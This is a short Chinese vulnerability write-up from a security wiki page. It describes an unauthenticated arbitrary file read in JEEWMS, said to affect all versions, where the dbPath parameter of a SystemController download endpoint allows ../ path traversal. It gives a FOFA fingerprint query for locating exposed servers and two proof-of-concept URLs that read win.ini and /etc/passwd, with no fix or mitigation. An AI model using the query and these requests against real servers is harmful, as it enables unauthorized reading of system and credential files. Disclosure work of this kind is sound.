menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right JEEWMS存在未授权任意文件读取漏洞 chevron_right JEEWMS存在未授权任意文件读取漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    JEEWMS存在未授权任意文件读取漏洞.md
    901 B / 2021-07-15 19:54:20
        ## **JEEWMS存在未授权任意文件读取漏洞**

## 漏洞描述

**JEEWMS存在未授权任意文件读取漏洞**

## 漏洞影响

> JEEWMS全版本

## FOFA

> body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" && body="仓"

## 漏洞复现

漏洞代码:

**org.jeecgframework.web.system.controller.core.SystemController**

![img](/resource/JEEWMS/1-1.png)

可以看到dbpath可被控制,最终读取路径为:系统配置路径+dbpath

这样的读取方式可被../../控制路径,造成任意文件读取,同时该接口未做权限验证,可未授权任意文件读取 

##POC:

```
http://x.x.x.x:8088/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini 
```

![img](/resource/JEEWMS/1-2.png)

```
http://x.x.x.x:8020/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd 
```

![image-20210518102623730](/resource/JEEWMS/1-3.png)
    links
    file_download